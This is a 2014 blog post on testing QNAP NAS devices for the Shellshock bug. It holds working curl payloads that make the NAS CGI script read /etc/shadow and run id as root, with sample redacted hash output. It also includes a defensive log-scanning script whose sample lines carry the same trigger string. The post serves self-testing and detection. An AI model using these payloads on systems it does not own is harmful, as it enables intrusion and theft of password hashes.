Saturday, September 27, 2014

Using curl to test Qnap NAS for Shellshock

The following briefly appeared in a Qnap forum, but was apparently quickly removed.

Since I feel it's a useful test, here it is:

Fun Shellshock test with curl

Testing your NAS for the Shellshock vulnerability with curl:

NAS_IP=192.168.1.XXX    # Use the IP or the name of your NAS

URL=http://$NAS_IP:8080/cgi-bin/index.cgi
curl -A "() { :; }; echo Content-Type: text/plain; echo; echo; cat /etc/shadow" $URL

And enjoy the output of your users and crypted passwords in a format almost ready to be fed to John the Ripper:

admin:$1$$abc...:14233:0:99999:7:::
guest:$1$$abc...:14233:0:99999:7:::
httpdusr:!:16087:0:99999:7:::
otheruser:$1$$abc...:16087:0:99999:7:::
TimeMachine:$1$$abc...:16087:0:99999:7:::
Location:/cgi-bin/login.html?20130912

(The password hashes have been redacted in this output, of course.)

If your NAS can be reached from the Internet, you had better disconnect it now...

What this also shows is that the NAS http server appears to be running as root, since the /etc/shadow file should only be readable by root!

And indeed:

$ curl -A "() { :; }; echo Content-Type: text/plain; echo; echo; id" $URL

uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)

This shows the id of the web server process as "admin", with UID 0 and GID 0. So it's really running as root, which is certainly very helpful for NAS-hackers.
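
For the defender's side of the test above, here is an added example (not part of the original post or the forum thread) that scans web server access logs for requests carrying the "() {" prefix that the curl command places in the User-Agent header. The "combined" log format, the function names and the sample lines are assumptions; the post does not show what the NAS web server actually logs.

```shell
#!/bin/sh
# Added example: find clients that sent a header value starting with the
# bash function-definition prefix "() {" (the Shellshock trigger).
# Assumption: logs are in Apache/NGINX "combined" format.

# Constructed sample log lines (documentation IP ranges, not real traffic).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [27/Sep/2014:10:01:02 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [27/Sep/2014:10:03:44 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 200 934 "-" "() { :; }; echo Content-Type: text/plain; echo; echo; id"
198.51.100.7 - - [27/Sep/2014:10:03:51 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 404 210 "() { :; }; echo probe" "curl/7.38.0"
203.0.113.5 - - [27/Sep/2014:11:15:09 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" 403 199 "-" "() { :; }; echo probe"
EOF
}

# Reads log lines on stdin and prints one line per offending client:
#   <client-ip> <requests with trigger> <of those, answered with 2xx>
# A 2xx answer to such a request deserves attention first, because the
# CGI script was reached and may have executed the injected commands.
shellshock_hits() {
    awk -F'"' '
        {
            # Splitting on double quotes puts the quoted values (request
            # line, Referer, User-Agent) into the even-numbered fields.
            for (i = 2; i <= NF; i += 2) {
                # The trigger sits at the very start of the header value.
                if (index($i, "() {") == 1) {
                    split($1, pre, " ")    # $1 = ip ident user [time]
                    split($3, post, " ")   # $3 = status bytes
                    hits[pre[1]]++
                    if (post[1] ~ /^2/) ok[pre[1]]++
                    break
                }
            }
        }
        END { for (ip in hits) print ip, hits[ip], ok[ip] + 0 }
    ' | sort
}

# Stand-alone run over the constructed sample.
sample_log | shellshock_hits
```

On a real system, feed the web server's own access log to shellshock_hits instead of sample_log. Headers that are not logged (Cookie, for instance) are not covered by this check.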